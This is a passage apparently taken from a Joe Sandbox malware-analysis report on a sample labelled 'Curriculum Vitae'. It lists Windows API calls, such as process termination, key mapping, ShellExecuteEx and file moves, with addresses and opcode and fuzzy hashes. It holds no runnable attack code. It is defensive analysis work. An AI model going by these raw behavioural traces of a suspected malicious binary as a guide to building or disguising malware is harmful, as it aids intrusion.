                      • Opcode Fuzzy Hash: 50f6051d5973aba0ba706d04b7578e0fd5a8bc2976ba6ce44f0a150fd00927b9
                      • Instruction Fuzzy Hash: 57110C7640020AFFDF119F91DC48E9A7F6CEB04390F048055FA599A1A1C7719D55EF70
                      APIs
                      • GetDC.USER32(00000000), ref: 00D95218
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D95229
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D95230
                      • ReleaseDC.USER32(00000000,00000000), ref: 00D95238
                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D9524F
                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00D95261
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CapsDevice$Release
                      • String ID:
                      • API String ID: 1035833867-0
                      • Opcode ID: ecb7295af41e9bf53dcfa1c289c612dfd0b65814833812b8b8f581ead7722742
                      • Instruction ID: ad25514a3011e54b9e14840dd7175297862a47b83f1df849e5d6b027da85373c
                      • Opcode Fuzzy Hash: ecb7295af41e9bf53dcfa1c289c612dfd0b65814833812b8b8f581ead7722742
                      • Instruction Fuzzy Hash: 44014475A41716BBEF105BA59D49E5EBF78EF44751F084065FB08E7391D6709800CB70
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D31BF4
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D31BFC
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D31C07
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D31C12
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D31C1A
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D31C22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: 20a0328a67821ee45d1474412dc62f00ce7221ed1a6a2f7b9b4ed43601391d88
                      • Instruction ID: 9a153ab505fcbb8a024032c1794f509fc830d566dc602ccd0aabf0d92f3792be
                      • Opcode Fuzzy Hash: 20a0328a67821ee45d1474412dc62f00ce7221ed1a6a2f7b9b4ed43601391d88
                      • Instruction Fuzzy Hash: 0C016CB094275A7DE3008F5A8C85B52FFA8FF19354F00411BD15C47A41C7F5A864CBE5
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D9EB30
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D9EB46
                      • GetWindowThreadProcessId.USER32(?,?), ref: 00D9EB55
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D9EB64
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D9EB6E
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D9EB75
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: 17141a6bc8d3a4eb164d9a0c2e5faeaad28a22ce42d69b9a59ef331a7a23b51b
                      • Instruction ID: f4b7640a143a469afc27a094c308c91ec2cdc2853e4b535bdd94bfafc1682293
                      • Opcode Fuzzy Hash: 17141a6bc8d3a4eb164d9a0c2e5faeaad28a22ce42d69b9a59ef331a7a23b51b
                      • Instruction Fuzzy Hash: EBF09A7265025ABBE7205BA39C0EEEF3A7CEFCAB15F001158F705D12A0D7A01A01CAB4
                      APIs
                      • GetClientRect.USER32(?), ref: 00D87452
                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D87469
                      • GetWindowDC.USER32(?), ref: 00D87475
                      • GetPixel.GDI32(00000000,?,?), ref: 00D87484
                      • ReleaseDC.USER32(?,00000000), ref: 00D87496
                      • GetSysColor.USER32(00000005), ref: 00D874B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                      • String ID:
                      • API String ID: 272304278-0
                      • Opcode ID: 8e2f6da85db06002a4cdc8123e5401ca5b6d128e83d725f45fcc488f62898293
                      • Instruction ID: e3157ac32ec8fcb78dc97f4f585f2aa1501aea9634fee32ce1d148cb86726a3e
                      • Opcode Fuzzy Hash: 8e2f6da85db06002a4cdc8123e5401ca5b6d128e83d725f45fcc488f62898293
                      • Instruction Fuzzy Hash: BF018B31410206EFDB10AFA8DC08FAA7BB5FB04311F251060FA19E22B1CB315E42AB60
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D9187F
                      • UnloadUserProfile.USERENV(?,?), ref: 00D9188B
                      • CloseHandle.KERNEL32(?), ref: 00D91894
                      • CloseHandle.KERNEL32(?), ref: 00D9189C
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D918A5
                      • HeapFree.KERNEL32(00000000), ref: 00D918AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: 2f49610e0b8ffb1004938865ea69100d3b190d59becab29f9bea4cdabae18ba6
                      • Instruction ID: 0fb18e3fe7484b5a5b17a893e091f94b1dd69c3532bf18627417f8994bf50fcb
                      • Opcode Fuzzy Hash: 2f49610e0b8ffb1004938865ea69100d3b190d59becab29f9bea4cdabae18ba6
                      • Instruction Fuzzy Hash: C0E0C236514703BBDB015BE2ED0CD0ABB29FB59B22B109220F329C16B0CB329420DF60
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D3BEB3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: D%$D%$D%$D%
                      • API String ID: 1385522511-2722557190
                      • Opcode ID: e1c02f41184f9c99738a3183fa66367aceecca7f8bbfb16a6d7bfe4762eb2544
                      • Instruction ID: d52176be49d50ac7d3dd01d0684885f0aa64b25f7f3bfe3f5b09ad885f80ab69
                      • Opcode Fuzzy Hash: e1c02f41184f9c99738a3183fa66367aceecca7f8bbfb16a6d7bfe4762eb2544
                      • Instruction Fuzzy Hash: 05912B75A00206CFCB24CF69C4916A9B7F1FF58324F24416EDA86AB350D731E981CBA0
                      APIs
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D9C6EE
                      • _wcslen.LIBCMT ref: 00D9C735
                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D9C79C
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D9C7CA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ItemMenu$Info_wcslen$Default
                      • String ID: 0
                      • API String ID: 1227352736-4108050209
                      • Opcode ID: 5178c53e3049458bd821f130bdc707b8ea8ac6bd0a791e9eae221aae9dbf29e7
                      • Instruction ID: c58e408371316ceda77bf91e909a4bb9eca960886ca2122fbdee37fccfeacf78
                      • Opcode Fuzzy Hash: 5178c53e3049458bd821f130bdc707b8ea8ac6bd0a791e9eae221aae9dbf29e7
                      • Instruction Fuzzy Hash: C151CF716243019BDB109F68C885B6B77E4EF89310F082A2DF995E71E0DB70D9448B72
                      APIs
                      • ShellExecuteExW.SHELL32(0000003C), ref: 00DBAEA3
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                      • GetProcessId.KERNEL32(00000000), ref: 00DBAF38
                      • CloseHandle.KERNEL32(00000000), ref: 00DBAF67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseExecuteHandleProcessShell_wcslen
                      • String ID: <$@
                      • API String ID: 146682121-1426351568
                      • Opcode ID: a80951874f209894c17be460e5e0c5431812ee77692cc25dd289ce67aa8919ca
                      • Instruction ID: cb0e7158adaa94e1def663b4f48f52a6ad1bed1887457532b1dd7c735137ab60
                      • Opcode Fuzzy Hash: a80951874f209894c17be460e5e0c5431812ee77692cc25dd289ce67aa8919ca
                      • Instruction Fuzzy Hash: DA714575A00619DFCB14DF59C484A9EBBF0EF08310F048499E856AB3A2CB74ED45CBB1
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D97206
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D9723C
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D9724D
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D972CF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: DllGetClassObject
                      • API String ID: 753597075-1075368562
                      • Opcode ID: 21781b0ec9747b4afc49f1bb50ece13732318165561893646208bcb60ed462f9
                      • Instruction ID: 8df1feccaac4c8f76dcd35a6e1cf55308afe631a0fa4801e2b12fc8fb5fc7b9b
                      • Opcode Fuzzy Hash: 21781b0ec9747b4afc49f1bb50ece13732318165561893646208bcb60ed462f9
                      • Instruction Fuzzy Hash: 8E416AB1A24205EFDF15CF54C884A9A7BA9EF44710F2981A9BD099F20AD7B0D944CBB0
                      APIs
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DC2F8D
                      • LoadLibraryW.KERNEL32(?), ref: 00DC2F94
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DC2FA9
                      • DestroyWindow.USER32(?), ref: 00DC2FB1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$DestroyLibraryLoadWindow
                      • String ID: SysAnimate32
                      • API String ID: 3529120543-1011021900
                      • Opcode ID: a701d8a0a521eed7eb25de8a272aab2a2ef95355de76312a4ef1d3dc3da63846
                      • Instruction ID: f71034f3523a914d7a2d07ad872a91722d5a659c5790dd42ba9c4e26bdfc1633
                      • Opcode Fuzzy Hash: a701d8a0a521eed7eb25de8a272aab2a2ef95355de76312a4ef1d3dc3da63846
                      • Instruction Fuzzy Hash: C321887120020AABEB218F669C80FBB77B9EF59364F14521CFA50D71A0D671DC919770
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D54D1E,00D628E9,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002), ref: 00D54D8D
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D54DA0
                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D54D1E,00D628E9,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002,00000000), ref: 00D54DC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: e5e4aa2e0ea1d8214ccc8f0258028d96c56449a13463e72867f0b5f3890adbfb
                      • Instruction ID: 7e018f671950b18f8d224eca1d20794000735a7eeaaf4f1acfb1ee9b1b9ff1a2
                      • Opcode Fuzzy Hash: e5e4aa2e0ea1d8214ccc8f0258028d96c56449a13463e72867f0b5f3890adbfb
                      • Instruction Fuzzy Hash: 9FF03C34A5030ABBDB119F91DC49BAEBFB5EF44756F0800A5ED09E6260CB305989CAB1
                      APIs
                      • LoadLibraryA.KERNEL32 ref: 00D8D3AD
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D8D3BF
                      • FreeLibrary.KERNEL32(00000000), ref: 00D8D3E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: GetSystemWow64DirectoryW$X64
                      • API String ID: 145871493-2590602151
                      • Opcode ID: 4190ae865fe6bf5db5ec1eceadc60cb1db5ca991ff11fd6d78b697bce32214b7
                      • Instruction ID: 15fec189008c56897603fd47f63fe4fcf8e4f3e1a6a6486a58fcb922f8dedceb
                      • Opcode Fuzzy Hash: 4190ae865fe6bf5db5ec1eceadc60cb1db5ca991ff11fd6d78b697bce32214b7
                      • Instruction Fuzzy Hash: 6FF02031801B22ABC7313B108C08E69B322AF01701B599158EA8AE22D1CB20CD4087B6
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E9C
                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D34EAE
                      • FreeLibrary.KERNEL32(00000000,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                      • API String ID: 145871493-3689287502
                      • Opcode ID: 31f6af6fa7f1ef6bd371f61c22faf23f7c7a46de452cbe598665d9689eacbaf5
                      • Instruction ID: cfbf61df13cbe66f07fce1fab9703dd6b284a4dba20df11898830026a04e73f9
                      • Opcode Fuzzy Hash: 31f6af6fa7f1ef6bd371f61c22faf23f7c7a46de452cbe598665d9689eacbaf5
                      • Instruction Fuzzy Hash: 92E08635A117235F92211B266C18F6B6554AF81B62B0D0115FE08E2310DB64DD0641B1
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E62
                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D34E74
                      • FreeLibrary.KERNEL32(00000000,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E87
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                      • API String ID: 145871493-1355242751
                      • Opcode ID: 1256ced1daa77962d3fa1b295fbcd331b9e6317283e30ff1c0ef910b50e1501a
                      • Instruction ID: b88a0a1a0523b7986eccdd6218675e21cdf8223cc258c94b3d283b3f078b9db8
                      • Opcode Fuzzy Hash: 1256ced1daa77962d3fa1b295fbcd331b9e6317283e30ff1c0ef910b50e1501a
                      • Instruction Fuzzy Hash: 51D0C2329127235B46221B26AC08E8B2A18AF81F1130E0114FA08F2210CF24CD0281F0
                      APIs
                      • GetCurrentProcessId.KERNEL32 ref: 00DBA427
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DBA435
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DBA468
                      • CloseHandle.KERNEL32(?), ref: 00DBA63D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CloseCountersCurrentHandleOpen
                      • String ID:
                      • API String ID: 3488606520-0
                      • Opcode ID: d841e6f2fc6857b449972c7bc9c58363f01a23d33de3a3db3fdbfa910ebe8027
                      • Instruction ID: eed26ac6139d4f4071b4f8b2451a76c7989bdbb1da8fb1231823dc910e06c097
                      • Opcode Fuzzy Hash: d841e6f2fc6857b449972c7bc9c58363f01a23d33de3a3db3fdbfa910ebe8027
                      • Instruction Fuzzy Hash: 42A193716047019FD720DF18C886F6AB7E5EF84714F14885DF69A9B392D770EC418BA1
                      APIs
                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00DD3700), ref: 00D6BB91
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D6BC09
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E01270,000000FF,?,0000003F,00000000,?), ref: 00D6BC36
                      • _free.LIBCMT ref: 00D6BB7F
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6BD4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                      • String ID:
                      • API String ID: 1286116820-0
                      • Opcode ID: 5fc767d921e47c7d6c9d233492d421c5fa156f49305d0c5ad9ff408866851d3c
                      • Instruction ID: a4de94fb29a42c9119f25a986d33e8d6024a79fa5bb57871d3f65719102dd1aa
                      • Opcode Fuzzy Hash: 5fc767d921e47c7d6c9d233492d421c5fa156f49305d0c5ad9ff408866851d3c
                      • Instruction Fuzzy Hash: 3151A971900209AFCB10DF799C8197AB7B8EF44370B15426BE555E72A1EB309EC59B70
                      APIs
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D9CF22,?), ref: 00D9DDFD
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D9CF22,?), ref: 00D9DE16
                        • Part of subcall function 00D9E199: GetFileAttributesW.KERNEL32(?,00D9CF95), ref: 00D9E19A
                      • lstrcmpiW.KERNEL32(?,?), ref: 00D9E473
                      • MoveFileW.KERNEL32(?,?), ref: 00D9E4AC
                      • _wcslen.LIBCMT ref: 00D9E5EB
                      • _wcslen.LIBCMT ref: 00D9E603
                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00D9E650
                      Memory Dump Source
